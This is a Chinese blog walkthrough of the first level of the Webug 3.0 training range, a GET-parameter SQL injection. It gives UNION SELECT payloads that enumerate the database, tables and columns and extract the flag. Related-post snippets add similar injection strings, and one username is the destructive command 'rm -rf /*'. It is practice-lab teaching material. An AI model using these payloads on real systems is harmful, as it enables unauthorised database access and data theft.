webug3.0第一题 普通的get注入

最新推荐文章于 2023-09-11 23:34:16 发布
原创 最新推荐文章于 2023-09-11 23:34:16 发布 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过GET请求进行SQL注入的方法,展示了如何利用构造特定的SQL语句来获取目标数据库中的信息,包括数据库名、表名、列名及最终的数据内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

普通的get注入

首先这是这道题

我们点击去

发现有一个可以提交数据的地方,对于常见的漏洞来说,可以提交数据的地方就是可以控制输入的地方,就有可能存在漏洞,而且我们从网页上看到他显示的有四条数据  可以构造语句如下:1 '  union select 1,2,3,database()#我们直接试一下sql注入语句

则·当前数据库为pentesterlab

我们再爆一下表1 '  union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#

可以看到有一个flag表  我们爆一下列

1 '  union select 1,2,3,column_name from information_schema.columns where table_name='flag'#

爆字段1 '  union select 1,2,3,flag from flag#

flag:204f704fbbcf6acf398ffee11989b377

Webug3.0 初级攻略 1-16关
rm -rf /*
02-27 2933
虚拟机下载路径: 链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg  提取码:7jfs  第一关:很简单的一个注入   使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试 1.提交 ' 报错,可能存在注入点   还是一个字符型的注入漏洞 测试语句:http://172.27.73.13/pentes...
Webug3.0-渗透基础-解
Blood_Pupil的博客
03-13 7716
Webug下载与安装 首先在Webug3.0官网 下载虚拟机 在本地进行解压,解压后为Win2003 VM虚拟机镜像。 虚拟机密码为123456,崩溃后可以直接将快照恢复到gh0st即可。 在kali下可以使用 Vmware Linux版打开,Windonws 下可以使用 Vmware Windows版打开,Mac下可以使用 Vmware Fusion打开。 在虚拟机命令窗口敲入ipconfi...
Webug3.0 教程 第一关:很简单的一个注入 普通GET注入
weixin_44716769的博客
11-13 909
Webug3.0 教程 第一关:很简单的一个注入 普通GET注入 说明:以下步骤是我打靶场的记录,与大家分享我的学习过程,请各位大佬指正。 本考点:SQL注入之mysql的联合查询爆破。 1. 打开本,看到的是这样的界面 2. 在原始URL后分别加’和’’,在输入’时数据库报错,发现有字符型SQL注入漏洞 数据库对于单引号的规则: 1.单引号必须成对出现,否则数据库就会报错; 2.如果两...
webug3.0第一关学习笔记
lxw826982262的博客
07-26 757
第一普通GET注入 前言:这个注入前期有看过相关的教学视频,对sql注入有一些了解,在手工注入和工具注入中,原理都是修改参数,让数据库报错,是因为开发人员在编程时,对用户输入的参数没有做过滤,直接把错误参数注入到数据库执行,并返回我们想要的结果。 第一种方法:手工注入 1.打开目页面 在“id=1”后面键入单引号根据错误信息判断此参数存在注入点并可判断出后台数据库为MySQL,错误信息如...
SQL注入GET型常规注入
Jim的博客
08-14 4549
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
经典的注入语句
数据库天地
10-04 199
经典的注入语句 注意:对于普通get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。 and exists (s...
SQL注入GET
最新发布
qq_51393133的博客
09-11 1679
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webug4.0通关笔记---(第一天:布尔注入)
liver100day的博客
04-23 800
布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只关心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
UG3.0_win7_64位下的启动及安装
11-06
UG3.0_win7_64位下的启动及安装
我的Webug通关之路:第一关(基础篇)
weixin_45822019的博客
03-14 271
我的Webug通关之路
我的webug通关之路:第一关(中级篇)
weixin_45822019的博客
04-21 199
一、关卡目 二、进入后点击发现无效果 三、根据查看源代码发现路径错误 四、修改源代码后,正常返回图片 五、这个漏洞是任意文件读取漏洞 六、进行检验 ...
实验:学习GET注入
茶花语的博客
02-25 5310
使用sqlmap工具,基于GET请求的SQL注入实验
GET注入-盲注
weixin_52620919的博客
11-17 564
盲注,意味着页面不会显示SQL语句的错误,我们要通过一定的手段来判断构造的注入语句是否正确执行。 有两种方式:布尔型和时间型。 布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行,时间型则是根据页面加载时间是否变化来判断的。 相关函数 盲注需要掌握一些MySQL的相关函数: length(str): 返回str字符串的长度。如执行select length(database()) 则会返回当前数据库名称的长度。 而单独selectdatabase()则回返回当前数据库的名称。 substr(
数字型,字符型GET注入
m0_64338210的博客
02-16 3172
SQL注入基于联合查询的字符型GET注入 实验步骤: 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站 Less-2。访问的URL为: http:/ /[靶机 IP]/sqli-labs/Less-2/ 正在上传…重新上传取消 登录后,根据网页提示,先给定一个GET参数,即: http:// [靶机IP]/sqli-labs/Less-2 /?id=1 此时页面显示 id=1的用户名Du
GET报错注入
qq_43776408的博客
06-09 722
报错介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入错的语句来强迫数据库 爆出数据来 GET单引号报错注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示错误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是错的 所以就是多出了一个\
浅谈自己记录打靶webug3.0第一关的坑
goddemon
05-20 446
因为原文已经提示过为get注入(所以直接入手注入,如果需要判断是否有注入点的话可以利用’ 和and 1=1 的方法状况代) sql注入手动注入的两种方法 ①sql简单注入方式进行注入 一,首先尝试利用’进行注入发觉弹出错误页面,即考虑注入方式为字符注入(因为整数注入的话是显示回旋为正常页面的) 二,字符注入因此考虑闭合单引号 即构造‘ – ’ –在这里的作用是注释掉后面的运算符的作用,实现字符注入 三,构造语句进行注入 ’ order by 4 -- ‘//利用回旋的页面进行判断有几个字符,当by为4的时
Webug3.0靶机搭建
lxw826982262的博客
07-16 1216
Webug3.0靶机搭建 一、安装前的准备 安装环境:wmware; 安装前的准备:61个webug压缩包;压缩包要下全,不然会导致windows2003无法打开。 二、webug3.0的安装 第一步解压 下载完成后61个压缩包如图所示: 第二步:选择其中一个进行解压得到一个2003的文件夹。 第三步:然后打开虚拟机,点左上角点击打开,选择2003文件夹,就看到虚拟机文件,打开它就得到如下图所示,...
webug4.0xxe注入
07-27
XXE(XML External Entity)注入是一种攻击技术,用于利用应用程序对外部实体的处理不当。通过在用户提供的输入中插入恶意的实体引用,攻击者可以读取本地文件、执行远程请求等。针对这种注入漏洞,应用程序应该对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值